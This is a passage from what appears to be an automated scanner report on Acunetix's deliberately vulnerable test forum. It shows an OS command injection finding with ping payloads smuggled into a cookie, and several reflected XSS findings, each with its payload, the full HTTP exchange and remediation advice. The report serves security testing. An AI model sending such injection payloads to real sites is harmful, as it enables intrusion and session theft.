Cookie: ASPSESSIONIDCSDDASDC=PHADEOCAMGLDLKEGHBONIKAP;ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #' ;ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #" ;ping -n 21 127.0.0.1; ASPSESSIONIDCQDADSDD=MPMGBAPAKOKCPOEELPOFOMHJ; ASPSESSIONIDACBTRBSB=OAFBLDJDFBIHFLLJGAGJKHEM; ASPSESSIONIDCACTQATA=DDOIAMCBKAPIFBFNHODBPPBM; ASPSESSIONIDCCBSQBSA=GCBADAJDLLGJNJNEAOPBDOIH; ASPSESSIONIDACBRTATA=FLLKILFAHBNNLCLMIEAKBHCI; ASPSESSIONIDACDRSBTA=JNIPMOLCABJLIOBMPMGFKGKI; ASPSESSIONIDCCDQTASB=DBJODPOBBKMNHLMJBJKKJFLM; ASPSESSIONIDCAASTBSA=GGDPIOBBCCCMPNIEKAMMHDKJ; ASPSESSIONIDAACSSATB=MPMLJFOBDEFNOPANFGGELGCG
Connection: keep-alive

HTTP Response
Full response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Sun, 19 Jul 2026 15:39:01 GMT
Content-Length: 3788


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBeginEditable name="doctitle" -->
<title>acuforum Acunetix Web Vulnerability Scanner</title>
<!-- InstanceEndEditable -->
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<!-- InstanceBeginEditable name="head" -->
<!-- InstanceEndEditable -->
<link href="styles.css" rel="stylesheet" type="text/css">
</head>
<body> 
<table width="100%"  border="0" cellpadding="10" cellspacing="0"> 
  <tr bgcolor="#008F00"> 
    <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> 
    <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> 
  </tr> 
  <tr> 
    <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> 
     - <a href="./Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0" class="menu">register</a> 
	- <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a>
    </div></td> 
  </tr> 
  <tr> 
    <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" -->
	<div class="path">
			Acunetix Web Vulnerability Scanner
		</div>
	<table width="100%" border="0" cellspacing="0" cellpadding="5">
      <tr>
        <td class="tableheader">Thread</td>
        <td class="tableheader">Posts</td>
		<td class="tableheader">Posted by</td>
        <td class="tableheader">Last Post</td>
      </tr>   
	<tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=0'>1</a></div></td><td>1</td><td>admin</td><td>11/9/2005 12:16:25 PM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=1'>2</a></div></td><td>2</td><td>admin</td><td>7/19/2026 3:23:36 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=2'>3</a></div></td><td>2</td><td>admin</td><td>11/9/2005 1:08:52 PM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=3'>aaa</a></div></td><td>1</td><td>admin</td><td>11/9/2005 1:45:54 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=4'>Спилы Деревьев
</a></div></td><td>1</td><td>Charlesitaxy</td><td>7/19/2026 3:22:51 PM</td></tr>
	</table>
	
	<!-- InstanceEndEditable --></td> 
  </tr> 
  <tr align="right" bgcolor="#FFFFFF"> 
    <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> 
  </tr> 
</table> 
<div style="background-color:lightgray;width:80%;margin:auto;left:10%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
	<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p>
</div>
</body>
<!-- InstanceEnd --></html>
Issue Background

OS command injection occurs when an application incorporates user-controllable input into a command that is executed by the host operating-system shell. A successful attacker runs arbitrary commands with the privileges of the application process, which typically means full compromise of the application and its data and a foothold for lateral movement into the wider infrastructure.

Exploitation uses shell metacharacters (;, |, &, $(...), backticks, newlines) to break out of the intended command and append attacker-controlled commands. Even when output is not returned, time-based and out-of-band techniques confirm and exploit the flaw, so it is consistently high or critical severity.

Remediation

Avoid invoking the OS shell with untrusted input wherever possible:

  • Use safe platform APIs instead of shelling out (e.g. library calls for file or network operations rather than system() / exec with a shell).
  • Pass arguments as an array, never a shell string - execute the binary directly with an argument vector so the shell never parses metacharacters; do not enable shell interpolation.
  • Strict allow-list validation - if a value must reach a command, validate it against a tight allow-list (e.g. a known set of filenames or numeric IDs) and reject everything else.
  • Least privilege - run the process with the minimum OS rights and in a sandbox/container so a breakout has limited reach.

High CWE-79 - Cross-Site Scripting 10 findings

↩ Glossary5. Cross-Site Scripting (Reflected) ✓ PHASE 2 VERIFIED
Severity: High  |  Confidence: Certain  |  CWE: CWE-79 [ref]  |  OWASP: n/a  |  Discovered: 2026-07-18 19:43:25
URL
http://testasp.vulnweb.com/Search.asp?tfSearch=%3Cmarquee%20onstart%3Dalert%281%29%3E
Vulnerable Parameter
tfSearch
Detail
XSS payload reflected unencoded: <marquee onstart=alert(1)> (text/html response; payload survives in body without HTML-entity-encoding -- structural proof of XSS regardless of AI verdict)
Payload
<marquee onstart=alert(1)>
Detection Heuristic
XSS payload reflected unencoded: <marquee onstart=alert(1)> (text/html response; payload survives in body without HTML-entity-encoding -- structural proof of XSS regardless of AI verdict)
AI Confidence
95%
HTTP Request
Full request
GET /Search.asp?tfSearch=%3Cmarquee%20onstart%3Dalert%281%29%3E HTTP/1.1
Host: testasp.vulnweb.com
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://testasp.vulnweb.com/Search.asp?tfSearch=admin
Accept-Encoding: gzip, deflate, br
Cookie: ASPSESSIONIDCSDDASDC=PHADEOCAMGLDLKEGHBONIKAP; ASPSESSIONIDCQDADSDD=MPMGBAPAKOKCPOEELPOFOMHJ; ASPSESSIONIDACBTRBSB=OAFBLDJDFBIHFLLJGAGJKHEM; ASPSESSIONIDCACTQATA=DDOIAMCBKAPIFBFNHODBPPBM; ASPSESSIONIDCCBSQBSA=GCBADAJDLLGJNJNEAOPBDOIH; ASPSESSIONIDACBRTATA=FLLKILFAHBNNLCLMIEAKBHCI; ASPSESSIONIDACDRSBTA=JNIPMOLCABJLIOBMPMGFKGKI; ASPSESSIONIDCCDQTASB=DBJODPOBBKMNHLMJBJKKJFLM; ASPSESSIONIDCAASTBSA=GGDPIOBBCCCMPNIEKAMMHDKJ
Connection: keep-alive

HTTP Response
Full response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/8.5
Set-Cookie: ASPSESSIONIDAACSSATB=CPJMJFOBGCJBCOHGOEIJOBEM; path=/
X-Powered-By: ASP.NET
Date: Sat, 18 Jul 2026 23:43:25 GMT
Content-Length: 3841


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBeginEditable name="doctitle" -->
<title>acuforum search</title>
<!-- InstanceEndEditable -->
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable -->
<link href="styles.css" rel="stylesheet" type="text/css">
</head>
<body> 
<table width="100%"  border="0" cellpadding="10" cellspacing="0"> 
  <tr bgcolor="#008F00"> 
    <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> 
    <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> 
  </tr> 
  <tr> 
    <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> 
     - <a href="./Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cmarquee%2520onstart%253Dalert%25281%2529%253E" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cmarquee%2520onstart%253Dalert%25281%2529%253E" class="menu">register</a> 
	- <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a>
    </div></td> 
  </tr> 
  <tr> 
    <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" -->
      <form name="frmSearch" method="get" action="">
        <div class="FramedForm">
          <input name="tfSearch" type="text" class="search">
          <input class="search" type="submit" value="search posts">
        </div>
      </form>      
        <div class='path'>You searched for '<marquee onstart=alert(1)>'</div><table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>admin</b> on 11/9/2005 12:16:25 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='path'>Found in: <a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a>/<a href='showthread.asp?id=0'>1</a></div><div class='posttitle'>1</div><div class='posttext'>1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>admin</b> on 11/9/2005 12:16:35 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='path'>Found in: <a href='showforum.asp?id=1'>Weather</a>/<a href='showthread.asp?id=0'>1</a></div><div class='posttitle'>1</div><div class='posttext'>1</div></td></tr></table>      
      <!-- InstanceEndEditable --></td> 
  </tr> 
  <tr align="right" bgcolor="#FFFFFF"> 
    <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> 
  </tr> 
</table> 
<div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px">
	<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p>
</div>
</body>
<!-- InstanceEnd --></html>
Issue Background

Cross-site scripting (XSS) arises when an application takes data that originated in an HTTP request and embeds it into a response without sufficient validation or output encoding, allowing an attacker to inject script that executes in the browser of another user. The injected script runs in the security context of the vulnerable origin, so it can read and exfiltrate the victim's session cookies and tokens, perform any action the victim is authorised to perform, capture keystrokes and form data, deface the page, or pivot to attack other applications that trust the same origin.

Reflected XSS echoes the input straight back in the immediate response and is typically delivered via a crafted link; stored XSS persists the input and fires for every user who views the affected content; DOM-based XSS occurs entirely client-side when JavaScript writes untrusted data into a dangerous sink. Impact ranges from low (a brochure site with no authentication) to critical (banking, admin consoles, or any same-origin sensitive function).

Remediation

Apply defence in depth at the point where data is written into a response:

  • Context-aware output encoding - HTML-encode untrusted data on output, selecting the encoding for the exact sink (HTML body, HTML attribute, JavaScript, URL, or CSS context). Prefer a framework's auto-escaping template engine over manual encoding.
  • Input validation - validate on arrival against a strict allow-list (type, length, character set); reject rather than sanitise.
  • Avoid dangerous sinks - do not pass untrusted data to innerHTML, document.write, eval, or framework HTML-bypass directives (dangerouslySetInnerHTML, v-html, [innerHTML]); use safe DOM APIs such as textContent.
  • Content-Security-Policy - deploy a strict, nonce/hash-based CSP as a second line of defence to limit the impact of any residual injection.
  • Cookie hardening - set HttpOnly on session cookies so injected script cannot read them.
↩ Glossary6. Cross-Site Scripting (Reflected) ✓ PHASE 2 VERIFIED
Severity: High  |  Confidence: Certain  |  CWE: CWE-79 [ref]  |  OWASP: n/a  |  Discovered: 2026-07-18 19:43:25
URL
http://testasp.vulnweb.com/Search.asp?tfSearch=%3Cinput%20onfocus%3Dalert%281%29%20autofocus%3E
Vulnerable Parameter
tfSearch
Detail
XSS payload reflected unencoded: <input onfocus=alert(1) autofocus> (text/html response; payload survives in body without HTML-entity-encoding -- structural proof of XSS regardless of AI verdict)
Payload
<input onfocus=alert(1) autofocus>
Detection Heuristic
XSS payload reflected unencoded: <input onfocus=alert(1) autofocus> (text/html response; payload survives in body without HTML-entity-encoding -- structural proof of XSS regardless of AI verdict)
AI Confidence
95%
HTTP Request
Full request
GET /Search.asp?tfSearch=%3Cinput%20onfocus%3Dalert%281%29%20autofocus%3E HTTP/1.1
Host: testasp.vulnweb.com
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://testasp.vulnweb.com/Search.asp?tfSearch=admin
Accept-Encoding: gzip, deflate, br
Cookie: ASPSESSIONIDCSDDASDC=PHADEOCAMGLDLKEGHBONIKAP; ASPSESSIONIDCQDADSDD=MPMGBAPAKOKCPOEELPOFOMHJ; ASPSESSIONIDACBTRBSB=OAFBLDJDFBIHFLLJGAGJKHEM; ASPSESSIONIDCACTQATA=DDOIAMCBKAPIFBFNHODBPPBM; ASPSESSIONIDCCBSQBSA=GCBADAJDLLGJNJNEAOPBDOIH; ASPSESSIONIDACBRTATA=FLLKILFAHBNNLCLMIEAKBHCI; ASPSESSIONIDACDRSBTA=JNIPMOLCABJLIOBMPMGFKGKI; ASPSESSIONIDCCDQTASB=DBJODPOBBKMNHLMJBJKKJFLM; ASPSESSIONIDCAASTBSA=GGDPIOBBCCCMPNIEKAMMHDKJ
Connection: keep-alive

HTTP Response
Full response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/8.5
Set-Cookie: ASPSESSIONIDAACSSATB=BPJMJFOBJCHHNPPEHHEGMGJG; path=/
X-Powered-By: ASP.NET
Date: Sat, 18 Jul 2026 23:43:25 GMT
Content-Length: 3873


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBeginEditable name="doctitle" -->
<title>acuforum search</title>
<!-- InstanceEndEditable -->
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable -->
<link href="styles.css" rel="stylesheet" type="text/css">
</head>
<body> 
<table width="100%"  border="0" cellpadding="10" cellspacing="0"> 
  <tr bgcolor="#008F00"> 
    <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> 
    <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> 
  </tr> 
  <tr> 
    <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> 
     - <a href="./Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cinput%2520onfocus%253Dalert%25281%2529%2520autofocus%253E" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cinput%2520onfocus%253Dalert%25281%2529%2520autofocus%253E" class="menu">register</a> 
	- <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a>
    </div></td> 
  </tr> 
  <tr> 
    <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" -->
      <form name="frmSearch" method="get" action="">
        <div class="FramedForm">
          <input name="tfSearch" type="text" class="search">
          <input class="search" type="submit" value="search posts">
        </div>
      </form>      
        <div class='path'>You searched for '<input onfocus=alert(1) autofocus>'</div><table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>admin</b> on 11/9/2005 12:16:25 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='path'>Found in: <a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a>/<a href='showthread.asp?id=0'>1</a></div><div class='posttitle'>1</div><div class='posttext'>1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>admin</b> on 11/9/2005 12:16:35 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='path'>Found in: <a href='showforum.asp?id=1'>Weather</a>/<a href='showthread.asp?id=0'>1</a></div><div class='posttitle'>1</div><div class='posttext'>1</div></td></tr></table>      
      <!-- InstanceEndEditable --></td> 
  </tr> 
  <tr align="right" bgcolor="#FFFFFF"> 
    <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> 
  </tr> 
</table> 
<div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px">
	<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p>
</div>
</body>
<!-- InstanceEnd --></html>
Issue Background

Cross-site scripting (XSS) arises when an application takes data that originated in an HTTP request and embeds it into a response without sufficient validation or output encoding, allowing an attacker to inject script that executes in the browser of another user. The injected script runs in the security context of the vulnerable origin, so it can read and exfiltrate the victim's session cookies and tokens, perform any action the victim is authorised to perform, capture keystrokes and form data, deface the page, or pivot to attack other applications that trust the same origin.

Reflected XSS echoes the input straight back in the immediate response and is typically delivered via a crafted link; stored XSS persists the input and fires for every user who views the affected content; DOM-based XSS occurs entirely client-side when JavaScript writes untrusted data into a dangerous sink. Impact ranges from low (a brochure site with no authentication) to critical (banking, admin consoles, or any same-origin sensitive function).

Remediation

Apply defence in depth at the point where data is written into a response:

  • Context-aware output encoding - HTML-encode untrusted data on output, selecting the encoding for the exact sink (HTML body, HTML attribute, JavaScript, URL, or CSS context). Prefer a framework's auto-escaping template engine over manual encoding.
  • Input validation - validate on arrival against a strict allow-list (type, length, character set); reject rather than sanitise.
  • Avoid dangerous sinks - do not pass untrusted data to innerHTML, document.write, eval, or framework HTML-bypass directives (dangerouslySetInnerHTML, v-html, [innerHTML]); use safe DOM APIs such as textContent.
  • Content-Security-Policy - deploy a strict, nonce/hash-based CSP as a second line of defence to limit the impact of any residual injection.
  • Cookie hardening - set HttpOnly on session cookies so injected script cannot read them.
↩ Glossary7. Cross-Site Scripting (Reflected) ✓ PHASE 2 VERIFIED
Severity: High  |  Confidence: Certain  |  CWE: CWE-79 [ref]  |  OWASP: n/a  |  Discovered: 2026-07-18 19:43:25
URL
http://testasp.vulnweb.com/Search.asp?tfSearch=%3Cbody%20onload%3Dalert%281%29%3E
Vulnerable Parameter
tfSearch
Detail
XSS payload reflected unencoded: <body onload=alert(1)> (text/html response; payload survives in body without HTML-entity-encoding -- structural proof of XSS regardless of AI verdict)
Payload
<body onload=alert(1)>
Detection Heuristic
XSS payload reflected unencoded: <body onload=alert(1)> (text/html response; payload survives in body without HTML-entity-encoding -- structural proof of XSS regardless of AI verdict)
AI Confidence
95%
HTTP Request
Full request
GET /Search.asp?tfSearch=%3Cbody%20onload%3Dalert%281%29%3E HTTP/1.1
Host: testasp.vulnweb.com
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://testasp.vulnweb.com/Search.asp?tfSearch=admin
Accept-Encoding: gzip, deflate, br
Cookie: ASPSESSIONIDCSDDASDC=PHADEOCAMGLDLKEGHBONIKAP; ASPSESSIONIDCQDADSDD=MPMGBAPAKOKCPOEELPOFOMHJ; ASPSESSIONIDACBTRBSB=OAFBLDJDFBIHFLLJGAGJKHEM; ASPSESSIONIDCACTQATA=DDOIAMCBKAPIFBFNHODBPPBM; ASPSESSIONIDCCBSQBSA=GCBADAJDLLGJNJNEAOPBDOIH; ASPSESSIONIDACBRTATA=FLLKILFAHBNNLCLMIEAKBHCI; ASPSESSIONIDACDRSBTA=JNIPMOLCABJLIOBMPMGFKGKI; ASPSESSIONIDCCDQTASB=DBJODPOBBKMNHLMJBJKKJFLM; ASPSESSIONIDCAASTBSA=GGDPIOBBCCCMPNIEKAMMHDKJ
Connection: keep-alive

HTTP Response
Full response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/8.5
Set-Cookie: ASPSESSIONIDAACSSATB=APJMJFOBNLKPCICAGFCHNGPB; path=/
X-Powered-By: ASP.NET
Date: Sat, 18 Jul 2026 23:43:25 GMT
Content-Length: 3829


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBeginEditable name="doctitle" -->
<title>acuforum search</title>
<!-- InstanceEndEditable -->
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable -->
<link href="styles.css" rel="stylesheet" type="text/css">
</head>
<body> 
<table width="100%"  border="0" cellpadding="10" cellspacing="0"> 
  <tr bgcolor="#008F00"> 
    <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> 
    <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> 
  </tr> 
  <tr> 
    <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> 
     - <a href="./Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbody%2520onload%253Dalert%25281%2529%253E" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbody%2520onload%253Dalert%25281%2529%253E" class="menu">register</a> 
	- <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a>
    </div></td> 
  </tr> 
  <tr> 
    <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" -->
      <form name="frmSearch" method="get" action="">
        <div class="FramedForm">
          <input name="tfSearch" type="text" class="search">
          <input class="search" type="submit" value="search posts">
        </div>
      </form>      
        <div class='path'>You searched for '<body onload=alert(1)>'</div><table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>admin</b> on 11/9/2005 12:16:25 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='path'>Found in: <a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a>/<a href='showthread.asp?id=0'>1</a></div><div class='posttitle'>1</div><div class='posttext'>1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>admin</b> on 11/9/2005 12:16:35 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='path'>Found in: <a href='showforum.asp?id=1'>Weather</a>/<a href='showthread.asp?id=0'>1</a></div><div class='posttitle'>1</div><div class='posttext'>1</div></td></tr></table>      
      <!-- InstanceEndEditable --></td> 
  </tr> 
  <tr align="right" bgcolor="#FFFFFF"> 
    <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> 
  </tr> 
</table> 
<div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px">
	<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p>
</div>
</body>
<!-- InstanceEnd --></html>
Issue Background

Cross-site scripting (XSS) arises when an application takes data that originated in an HTTP request and embeds it into a response without sufficient validation or output encoding, allowing an attacker to inject script that executes in the browser of another user. The injected script runs in the security context of the vulnerable origin, so it can read and exfiltrate the victim's session cookies and tokens, perform any action the victim is authorised to perform, capture keystrokes and form data, deface the page, or pivot to attack other applications that trust the same origin.

Reflected XSS echoes the input straight back in the immediate response and is typically delivered via a crafted link; stored XSS persists the input and fires for every user who views the affected content; DOM-based XSS occurs entirely client-side when JavaScript writes untrusted data into a dangerous sink. Impact ranges from low (a brochure site with no authentication) to critical (banking, admin consoles, or any same-origin sensitive function).

Remediation

Apply defence in depth at the point where data is written into a response:

  • Context-aware output encoding - HTML-encode untrusted data on output, selecting the encoding for the exact sink (HTML body, HTML attribute, JavaScript, URL, or CSS context). Prefer a framework's auto-escaping template engine over manual encoding.
  • Input validation - validate on arrival against a strict allow-list (type, length, character set); reject rather than sanitise.
  • Avoid dangerous sinks - do not pass untrusted data to innerHTML, document.write, eval, or framework HTML-bypass directives (dangerouslySetInnerHTML, v-html, [innerHTML]); use safe DOM APIs such as textContent.
  • Content-Security-Policy - deploy a strict, nonce/hash-based CSP as a second line of defence to limit the impact of any residual injection.
  • Cookie hardening - set HttpOnly on session cookies so injected script cannot read them.
↩ Glossary8. Cross-Site Scripting (Reflected) ✓ PHASE 2 VERIFIED
Severity: High  |  Confidence: Certain  |  CWE: CWE-79 [ref]  |  OWASP: n/a  |  Discovered: 2026-07-18 19:43:25
URL
http://testasp.vulnweb.com/Search.asp?tfSearch=%3Csvg%2Fonload%3Dalert%281%29%3E
Vulnerable Parameter
tfSearch
Detail
XSS payload reflected unencoded: <svg/onload=alert(1)> (text/html response; payload survives in body without HTML-entity-encoding -- structural proof of XSS regardless of AI verdict)
Payload
<svg/onload=alert(1)>
Detection Heuristic
XSS payload reflected unencoded: <svg/onload=alert(1)> (text/html response; payload survives in body without HTML-entity-encoding -- structural proof of XSS regardless of AI verdict)
AI Confidence
95%
HTTP Request
Full request
GET /Search.asp?tfSearch=%3Csvg%2Fonload%3Dalert%281%29%3E HTTP/1.1
Host: testasp.vulnweb.com
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://testasp.vulnweb.com/Search.asp?tfSearch=admin
Accept-Encoding: gzip, deflate, br
Cookie: ASPSESSIONIDCSDDASDC=PHADEOCAMGLDLKEGHBONIKAP; ASPSESSIONIDCQDADSDD=MPMGBAPAKOKCPOEELPOFOMHJ; ASPSESSIONIDACBTRBSB=OAFBLDJDFBIHFLLJGAGJKHEM; ASPSESSIONIDCACTQATA=DDOIAMCBKAPIFBFNHODBPPBM; ASPSESSIONIDCCBSQBSA=GCBADAJDLLGJNJNEAOPBDOIH; ASPSESSIONIDACBRTATA=FLLKILFAHBNNLCLMIEAKBHCI; ASPSESSIONIDACDRSBTA=JNIPMOLCABJLIOBMPMGFKGKI; ASPSESSIONIDCCDQTASB=DBJODPOBBKMNHLMJBJKKJFLM; ASPSESSIONIDCAASTBSA=GGDPIOBBCCCMPNIEKAMMHDKJ
Connection: keep-alive

HTTP Response
Full response
HTTP/1.1 200 OK
